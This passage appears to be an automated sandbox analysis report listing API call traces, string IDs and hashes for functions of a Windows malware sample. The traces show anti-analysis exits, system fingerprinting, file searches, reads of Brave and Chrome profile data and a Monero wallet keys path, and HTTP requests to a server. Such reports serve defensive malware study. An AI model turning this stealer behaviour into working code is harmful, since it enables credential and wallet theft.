                            • Instruction Fuzzy Hash: AC624FB5508200AFC35CDFA8FD8896637F9F74C701714872AA699C3674DB3AA841DF1A

                            Control-flow Graph (graph image not reproduced)
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00674839
                              • Part of subcall function 006747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • InternetOpenA.WININET(00690DFE,00000001,00000000,00000000,00000000), ref: 006762E1
                            • StrCmpCA.SHLWAPI(?,012BF3F0), ref: 00676303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00676335
                            • HttpOpenRequestA.WININET(00000000,GET,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00676385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006763BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006763D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006763FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0067646D
                            • InternetCloseHandle.WININET(00000000), ref: 006764EF
                            • InternetCloseHandle.WININET(00000000), ref: 006764F9
                            • InternetCloseHandle.WININET(00000000), ref: 00676503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: b5bef490f1ed27de80546f7ff99f69d69844c77eb91a026494ee025af379bd95
                            • Instruction ID: 125a75d0074880a0b0f1461e88518ce11f0744e8cc78b3d1189d75cbc434d9e4
                            • Opcode Fuzzy Hash: b5bef490f1ed27de80546f7ff99f69d69844c77eb91a026494ee025af379bd95
                            • Instruction Fuzzy Hash: 29715171A00218EBEF24EFE0CC45BEE77B9BB44700F108259F50A6B594DBB46A85CF55

                            Control-flow Graph (graph image not reproduced)
                            APIs
                              • Part of subcall function 0068A820: lstrlen.KERNEL32(00674F05,?,?,00674F05,00690DDE), ref: 0068A82B
                              • Part of subcall function 0068A820: lstrcpy.KERNEL32(00690DDE,00000000), ref: 0068A885
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00685644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006856A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00685857
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00685228
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 006852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00685318
                              • Part of subcall function 006852C0: lstrlen.KERNEL32(00000000), ref: 0068532F
                              • Part of subcall function 006852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00685364
                              • Part of subcall function 006852C0: lstrlen.KERNEL32(00000000), ref: 00685383
                              • Part of subcall function 006852C0: lstrlen.KERNEL32(00000000), ref: 006853AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0068578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00685940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00685A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00685A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 2f874007829561761055307864dc9334e9ba9c61912430fccbbb7a9d109cd85b
                            • Instruction ID: 05816c20202d3405cbda754235e98eaaaffd380f98f535eb5ff49ba7e20549cb
                            • Opcode Fuzzy Hash: 2f874007829561761055307864dc9334e9ba9c61912430fccbbb7a9d109cd85b
                            • Instruction Fuzzy Hash: 29E114B19101049AEB58FBE0DC969ED737EBF54300F50832DB90766591EF386B09CBA6

                            Control-flow Graph (graph image not reproduced)
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 006817C5
                            • ExitProcess.KERNEL32 ref: 006817D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: cba6c9864cab8d05bbb18efd7a9afa05182d9fab39c55b3a9655bcbace23f15f
                            • Instruction ID: daeea9648076416cf399369e855bcf7d28506fcb2e6839c0786725d3259cb7c3
                            • Instruction Fuzzy Hash: 6F5184B4A04209EFDF04EFA4D964EBE77BABF45304F104259E8066B740D770E956CB62

                            Control-flow Graph

                            [Control-flow graph image: basic blocks 687500-68768e; calls GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA]
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00687542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0068757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0068760A
                            • wsprintfA.USER32 ref: 00687640
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$i
                            • API String ID: 1544550907-2790019683
                            • Opcode ID: e4b9bda9e51a3064d8908240102591f6c6944f9dad84cd46f5e6fce60fe2b11b
                            • Instruction ID: 526ae371377fa9556a8f040e3bf58cb22c8497036f135a52258ee7de655c5764
                            • Instruction Fuzzy Hash: CF4194B1D04248ABDB10EF94DC45BDEBBB9FF18700F100299F50967280DB75AA44CBA5

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B1630), ref: 006898A1
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B15E8), ref: 006898BA
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B1648), ref: 006898D2
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B1678), ref: 006898EA
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B1528), ref: 00689903
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B8A68), ref: 0068991B
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012A5588), ref: 00689933
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012A54C8), ref: 0068994C
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B1690), ref: 00689964
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B16A8), ref: 0068997C
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B17C8), ref: 00689995
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B16D8), ref: 006899AD
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012A56A8), ref: 006899C5
                              • Part of subcall function 00689860: GetProcAddress.KERNEL32(77190000,012B16F0), ref: 006899DE
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 006711D0: ExitProcess.KERNEL32 ref: 00671211
                              • Part of subcall function 00671160: GetSystemInfo.KERNEL32(?), ref: 0067116A
                              • Part of subcall function 00671160: ExitProcess.KERNEL32 ref: 0067117E
                              • Part of subcall function 00671110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0067112B
                              • Part of subcall function 00671110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00671132
                              • Part of subcall function 00671110: ExitProcess.KERNEL32 ref: 00671143
                              • Part of subcall function 00671220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0067123E
                              • Part of subcall function 00671220: __aulldiv.LIBCMT ref: 00671258
                              • Part of subcall function 00671220: __aulldiv.LIBCMT ref: 00671266
                              • Part of subcall function 00671220: ExitProcess.KERNEL32 ref: 00671294
                              • Part of subcall function 00686770: GetUserDefaultLangID.KERNEL32 ref: 00686774
                              • Part of subcall function 00671190: ExitProcess.KERNEL32 ref: 006711C6
                              • Part of subcall function 00687850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006711B7), ref: 00687880
                              • Part of subcall function 00687850: RtlAllocateHeap.NTDLL(00000000), ref: 00687887
                              • Part of subcall function 00687850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0068789F
                              • Part of subcall function 006878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687910
                              • Part of subcall function 006878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00687917
                              • Part of subcall function 006878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0068792F
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012B8908,?,0069110C,?,00000000,?,00691110,?,00000000,00690AEF), ref: 00686ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00686AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00686AF9
                            • Sleep.KERNEL32(00001770), ref: 00686B04
                            • CloseHandle.KERNEL32(?,00000000,?,012B8908,?,0069110C,?,00000000,?,00691110,?,00000000,00690AEF), ref: 00686B1A
                            • ExitProcess.KERNEL32 ref: 00686B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: ab5ea9dae182d30677c9c83785e85f56ac16ae4358ce7a1ce11fffea60244206
                            • Instruction ID: 280f175798250a264a6b0f103319da8f61eab057a0935bc6cab3330a8e3347dc
                            • Instruction Fuzzy Hash: 52316F70904208AAEB48F7F0DC56BEE777ABF04300F10471DF612A6192DF746A01C7AA

                            Control-flow Graph

                            [Control-flow graph image: basic blocks 671220-67129d; calls GlobalMemoryStatusEx, ExitProcess]
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0067123E
                            • __aulldiv.LIBCMT ref: 00671258
                            • __aulldiv.LIBCMT ref: 00671266
                            • ExitProcess.KERNEL32 ref: 00671294
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: 97bf69915272c58e8dca3ed7e66370cd0960f36faa65c2c7dd7700e88468dd2f
                            • Instruction ID: f4da59abce0d32fc197c4174fffff7de678b4c79928a372316b673e95be7efad
                            • Instruction Fuzzy Hash: FE0162B0D44308FBDF54EBD4CC49B9DBB79AB04701F208149E719BA2C1D77456818759

                            Control-flow Graph

                            [Control-flow graph image: basic blocks 686aba-686b22; calls OpenEventA, CreateEventA, CloseHandle, Sleep, ExitProcess]
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012B8908,?,0069110C,?,00000000,?,00691110,?,00000000,00690AEF), ref: 00686ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00686AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00686AF9
                            • Sleep.KERNEL32(00001770), ref: 00686B04
                            • CloseHandle.KERNEL32(?,00000000,?,012B8908,?,0069110C,?,00000000,?,00691110,?,00000000,00690AEF), ref: 00686B1A
                            • ExitProcess.KERNEL32 ref: 00686B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: d0d06a7378dce0694bc8c14865676403d6b362a0859928388ad0f440b26d3cc4
                            • Instruction ID: 675665c06daf119e83fb6ca8c6d58b79277bc0bcf3756f5596f189e4e591f949
                            • Instruction Fuzzy Hash: F2F08270944209AFE744BBA0DD06BBD7B75FB14701F104719F913A11C1DBB15941D75B

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00674839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00674849
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: 1311565b44eabd86b57eb82a471d909336b0ffb7cda8dd3e8e9deb80780a36b9
                            • Instruction ID: 576788a75f0ca1851a178555ad0e6a60f6558a6ba5977ed4f58aed218c64e90d
                            • Instruction Fuzzy Hash: 892130B1D00209ABDF14EFA4E94AADD7B75FB45310F108629F955A7280DB706609CB91

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 00676280: InternetOpenA.WININET(00690DFE,00000001,00000000,00000000,00000000), ref: 006762E1
                              • Part of subcall function 00676280: StrCmpCA.SHLWAPI(?,012BF3F0), ref: 00676303
                              • Part of subcall function 00676280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00676335
                              • Part of subcall function 00676280: HttpOpenRequestA.WININET(00000000,GET,?,012BEBF8,00000000,00000000,00400100,00000000), ref: 00676385
                              • Part of subcall function 00676280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006763BF
                              • Part of subcall function 00676280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006763D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00685228
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 0cfe1d21faa7c548fe12194b5e9753487868f05c8b32f5eb76e5ea0259be1a6f
                            • Instruction ID: 4b5ab677f5c959d905ac2a62e2660e518844e251107e11fc8302b407fb1faf5a
                            • Instruction Fuzzy Hash: 61113370900108A7EB58FFA4DD92AED737AAF50300F50825DFC1A5A592EF34AB06C796
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00687917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0068792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 0154f652654ce937b2d4ea855c437d8afb52aa5e93d62e33b80b57e948daf00a
                            • Instruction ID: 86437310b4b384b81b82d188497a4f95c1facab35608bf4e300994f68abf7bc2
                            • Opcode Fuzzy Hash: 0154f652654ce937b2d4ea855c437d8afb52aa5e93d62e33b80b57e948daf00a
                            • Instruction Fuzzy Hash: A60186B1904204EFCB14DF94DD45BAABBB8F704B21F104329F645E3680D37559448BA1
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0067112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00671132
                            • ExitProcess.KERNEL32 ref: 00671143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 9b596acb999e8c070630fae11c425e007e3ade297bff9abc6df885870a875a53
                            • Instruction ID: c097c0352f8a81cbe88decf00c05e89e44a3d0b2d86a9a48c4359cbc6d7886c6
                            • Opcode Fuzzy Hash: 9b596acb999e8c070630fae11c425e007e3ade297bff9abc6df885870a875a53
                            • Instruction Fuzzy Hash: 07E0867094530CFBE7146BA4DC0AB087778BB04B01F104155F7087A5C0CAB526009699
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006710B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006710F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 2c02401388a88bf7452b1228c2fda4435bf7c23515dd0078eba1c71337d96e5b
                            • Instruction ID: 6d30a2bf4bc7abd741ecfb642946c7d71cfd98872ba505fdd166ccbc3b88d62f
                            • Opcode Fuzzy Hash: 2c02401388a88bf7452b1228c2fda4435bf7c23515dd0078eba1c71337d96e5b
                            • Instruction Fuzzy Hash: 69F0E271641308BBEB149AA8AC49FEEB7ECE705B15F304548F504E7280D9719E00CAA4
                            APIs
                              • Part of subcall function 006878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687910
                              • Part of subcall function 006878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00687917
                              • Part of subcall function 006878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0068792F
                              • Part of subcall function 00687850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006711B7), ref: 00687880
                              • Part of subcall function 00687850: RtlAllocateHeap.NTDLL(00000000), ref: 00687887
                              • Part of subcall function 00687850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0068789F
                            • ExitProcess.KERNEL32 ref: 006711C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 651e3ad9687aacb643840791475233ce9951de9babd8fd9abafd0e27b08b94a4
                            • Instruction ID: 1647e66dc855065e1c4a161b173d2db27ada8facc5f76f512942c65181ede998
                            • Opcode Fuzzy Hash: 651e3ad9687aacb643840791475233ce9951de9babd8fd9abafd0e27b08b94a4
                            • Instruction Fuzzy Hash: BAE08CA191420566CA4837F4AC0AB2A338E6B11345F440739BA0986242FE25E800876E
                            APIs
                            • wsprintfA.USER32 ref: 006838CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 006838E3
                            • lstrcat.KERNEL32(?,?), ref: 00683935
                            • StrCmpCA.SHLWAPI(?,00690F70), ref: 00683947
                            • StrCmpCA.SHLWAPI(?,00690F74), ref: 0068395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00683C67
                            • FindClose.KERNEL32(000000FF), ref: 00683C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 574b52fbf93e1a58cf1fd3e6ddb8f83dc7b5d2ce7ce1204db6d57e681c856dad
                            • Instruction ID: 75d993f2f8bc54d0476f954350c9aba167b3279046093e7a00f6025b0fbc78ce
                            • Opcode Fuzzy Hash: 574b52fbf93e1a58cf1fd3e6ddb8f83dc7b5d2ce7ce1204db6d57e681c856dad
                            • Instruction Fuzzy Hash: 3BA142B1900218AFDB64EFA4DC85FEE737DBB54700F044698E50D96241EB759B84CF62
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • FindFirstFileA.KERNEL32(00000000,?,00690B32,00690B2B,00000000,?,?,?,006913F4,00690B2A), ref: 0067BEF5
                            • StrCmpCA.SHLWAPI(?,006913F8), ref: 0067BF4D
                            • StrCmpCA.SHLWAPI(?,006913FC), ref: 0067BF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067C7BF
                            • FindClose.KERNEL32(000000FF), ref: 0067C7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: 02778efc478d1d48a6025e55e57bd80d1f189238a06215dbd0fd774473a96397
                            • Instruction ID: f42ce46037e94bbf1d3114bc93d44c240093d675b7b7590de8b6026b135ef158
                            • Opcode Fuzzy Hash: 02778efc478d1d48a6025e55e57bd80d1f189238a06215dbd0fd774473a96397
                            • Instruction Fuzzy Hash: 894267B19101045BDF58FBB0DD96EED737EAB44300F40865DFD0AA6181EE34AB49CBA6
                            APIs
                            • wsprintfA.USER32 ref: 0068492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00684943
                            • StrCmpCA.SHLWAPI(?,00690FDC), ref: 00684971
                            • StrCmpCA.SHLWAPI(?,00690FE0), ref: 00684987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00684B7D
                            • FindClose.KERNEL32(000000FF), ref: 00684B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 324cc1d3f9d96b01d745438321724236bc2ce8491ab7db67d4279f345d8d55c5
                            • Instruction ID: 9d175668a36c24c2fb14ba3578913c051bbfa8af788dfb3873d88ee413470df2
                            • Opcode Fuzzy Hash: 324cc1d3f9d96b01d745438321724236bc2ce8491ab7db67d4279f345d8d55c5
                            • Instruction Fuzzy Hash: C46164B2900219ABDF24EBA0DC45EEA737DBB48700F04869CF60996141EF75EB85CF95
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00684580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00684587
                            • wsprintfA.USER32 ref: 006845A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 006845BD
                            • StrCmpCA.SHLWAPI(?,00690FC4), ref: 006845EB
                            • StrCmpCA.SHLWAPI(?,00690FC8), ref: 00684601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068468B
                            • FindClose.KERNEL32(000000FF), ref: 006846A0
                            • lstrcat.KERNEL32(?,012BF510), ref: 006846C5
                            • lstrcat.KERNEL32(?,012BDEC0), ref: 006846D8
                            • lstrlen.KERNEL32(?), ref: 006846E5
                            • lstrlen.KERNEL32(?), ref: 006846F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 7c9dd13f25a554a0be8629f1d10c33b1283367cd06a7f78017392317ddaea005
                            • Instruction ID: 4f77a71fa2d2aaa30dfb2ecc9003e53242b787d9dc107458767dcdbe264093e2
                            • Opcode Fuzzy Hash: 7c9dd13f25a554a0be8629f1d10c33b1283367cd06a7f78017392317ddaea005
                            • Instruction Fuzzy Hash: A25162B1900218ABCB64FB70DC89FED737DBB58300F404698F64996190EF749B848F96
                            APIs
                            • wsprintfA.USER32 ref: 00683EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00683EDA
                            • StrCmpCA.SHLWAPI(?,00690FAC), ref: 00683F08
                            • StrCmpCA.SHLWAPI(?,00690FB0), ref: 00683F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068406C
                            • FindClose.KERNEL32(000000FF), ref: 00684081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 89908bd9d061e5ca72f09aaaf64d8af7cc923873ed30bfc5957cb5e359f56316
                            • Instruction ID: 83cb1f291076dc3aa367d1ce971ae94b721d23e91077d48d16564de53949fa19
                            • Opcode Fuzzy Hash: 89908bd9d061e5ca72f09aaaf64d8af7cc923873ed30bfc5957cb5e359f56316
                            • Instruction Fuzzy Hash: 6D5195B2900218AFCB28FBB0DC85EEA737DBB48300F40469DB65996140EB759B85CF95
                            APIs
                            • wsprintfA.USER32 ref: 0067ED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 0067ED55
                            • StrCmpCA.SHLWAPI(?,00691538), ref: 0067EDAB
                            • StrCmpCA.SHLWAPI(?,0069153C), ref: 0067EDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0067F2AE
                            • FindClose.KERNEL32(000000FF), ref: 0067F2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: b7e5e6ffe93a085bef3a83a8f932b4916106846756046fd0323476cb846b064e
                            • Instruction ID: 11e40726a7979a1fdda9b45d52620b34bb6c37c7906ba308b16e52cfa648eeb8
                            • Opcode Fuzzy Hash: b7e5e6ffe93a085bef3a83a8f932b4916106846756046fd0323476cb846b064e
                            • Instruction Fuzzy Hash: D0E1B7B151111856FB94FB90DC51EEE733EAF54300F4042DEB90A66492EE346F8ACF66
                            APIs
